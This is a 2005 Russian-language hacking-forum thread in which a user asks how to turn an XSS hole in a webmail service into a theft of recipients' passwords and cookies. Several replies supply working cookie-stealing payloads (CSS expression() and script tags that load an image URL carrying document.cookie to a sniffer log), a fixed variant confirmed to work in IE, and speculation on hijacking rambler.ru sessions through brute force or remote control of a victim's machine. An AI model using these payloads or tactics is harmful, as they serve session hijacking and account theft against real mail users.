ПОМОГИТЕ СРОЧНА ПЛЗ

Discussion in 'Песочница' started by anti_sec2, 14 Oct 2005.

  1. anti_sec2

    anti_sec2 New Member

    Joined:
    18 Sep 2005
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0
    привет если я отправил на одно мыло с :
    <hr style=top:expression(alert(19))>
    <span style=top:expression(alert(20))></span>

    и он выдал алерт 19 и 20
    тепер как мона использоват эти щтучки чтоб пасс писался на antichat.ru/sniff/log
    что я должен написат в писме?
    прощу поясней
    ЗАРАНЕЕ БЛОГОДАРЕН
     
    #1 anti_sec2, 14 Oct 2005
  2. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,159
    Likes Received:
    299
    Reputations:
    156
    вместо alert(19) или alert(20) тогда это:
    или так
    Если не прокатит, попробуй пробелы заменить на комментарий:
    <script>img=new/**/Image();img.src="/cgi-bin/s.jpg?"+document.cookie;</script>
     
    _________________________
    #2 censored!, 14 Oct 2005
  3. anti_sec2

    anti_sec2 New Member

    Joined:
    18 Sep 2005
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0


    СПАСИБО !!!!
     
    #3 anti_sec2, 14 Oct 2005
  4. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    285
    Likes Received:
    8
    Reputations:
    -1
    РАБОТАЕТ ТОЛЬКО В Ie!!!
     
    #4 bul666, 14 Oct 2005
  5. Kond4r

    Kond4r Elder - Старейшина

    Joined:
    27 Sep 2005
    Messages:
    100
    Likes Received:
    1
    Reputations:
    0
    <script>img=new/**/Image();img.src="/cgi-bin/s.jpg?"+document.cookie;</script>

    Это на сколько я знаю в опере тож!
     
    #5 Kond4r, 14 Oct 2005
  6. bul666

    bul666 Banned

    Joined:
    21 Apr 2005
    Messages:
    285
    Likes Received:
    8
    Reputations:
    -1
    ЧЕ??! Я имею ввиду, что:
    Работает только в IE...
     
    #6 bul666, 14 Oct 2005
  7. Kond4r

    Kond4r Elder - Старейшина

    Joined:
    27 Sep 2005
    Messages:
    100
    Likes Received:
    1
    Reputations:
    0
    С этим не поспоришь))))
     
    #7 Kond4r, 14 Oct 2005
  8. anti_sec2

    anti_sec2 New Member

    Joined:
    18 Sep 2005
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0

    НЕСРАБОТАЛ!!!!!!!!

    1) <hr style=top:expression(img = new Image(); img.src = "/cgi-bin/s.jpg?"+document.cookie;)>

    2)<hr style=top:expression(<script>img = new Image(); img.src = "/cgi-bin/s.jpg?"+document.cookie;</script>)>


    один невидим но логи не приходят!!!
    а другой виден значет не работает!!
     
    #8 anti_sec2, 14 Oct 2005
  9. Майор

    Майор Active Member

    Joined:
    24 Oct 2004
    Messages:
    557
    Likes Received:
    111
    Reputations:
    146
    так работает :
    HTML:
    <hr style=`top:expression(img=new Image()\;img.src="/cgi-bin/s.jpg?"+document.cookie)`>
     
    #9 Майор, 14 Oct 2005
  10. anti_sec2

    anti_sec2 New Member

    Joined:
    18 Sep 2005
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0

    спасибо !!! проверим
     
    #10 anti_sec2, 14 Oct 2005
  11. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Сразу видно человек пользовался прогой XSS Tester от LittleLamer =) Дельная прога, очень хотелось бы увидеть новую версию с новыми конструкциями xss вставок. А если человек о ней узнал, то это означает что он прочитал Небольшой faq Майора. Дедукция .. =)
     
    #11 Dronga, 14 Oct 2005
  12. anti_sec2

    anti_sec2 New Member

    Joined:
    18 Sep 2005
    Messages:
    14
    Likes Received:
    1
    Reputations:
    0
    #12 anti_sec2, 16 Oct 2005
  13. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Не уверен, но по-моему на сегодняшний день способов взлома rambler.ru нету. Куки для авторизации данный сервис не использует, сессия строго привязывается к ip-адресу. Что остаётся? Брут. Я не пробовал данный сервис на брутабельность.

    Вот если включить фантазию, то получается что у тебя есть ip жертвы... Значит если у него бажная ОС, то в теории можно управлять клмпом удаленно.. Если это получается, то надо ставить на машину жертвы прокси-сервер и лезть с отснифанной сессией и его айпишником.. Тока если так =) Далее начинается Unreal Tournament...
     
    #13 Dronga, 16 Oct 2005
    Last edited: 16 Oct 2005
  14. Dronga

    Dronga ВАША реклама ТУТ!!

    Joined:
    1 Jul 2005
    Messages:
    575
    Likes Received:
    239
    Reputations:
    249
    Так... Что-то я кинулся рамблер смотреть... Xss не проходит.. Куки для аутентификации всё-таки используются. Привязку к айпи проверить не получилось. А какую Xss используете?
     
    #14 Dronga, 16 Oct 2005
(You must log in or sign up to post here.)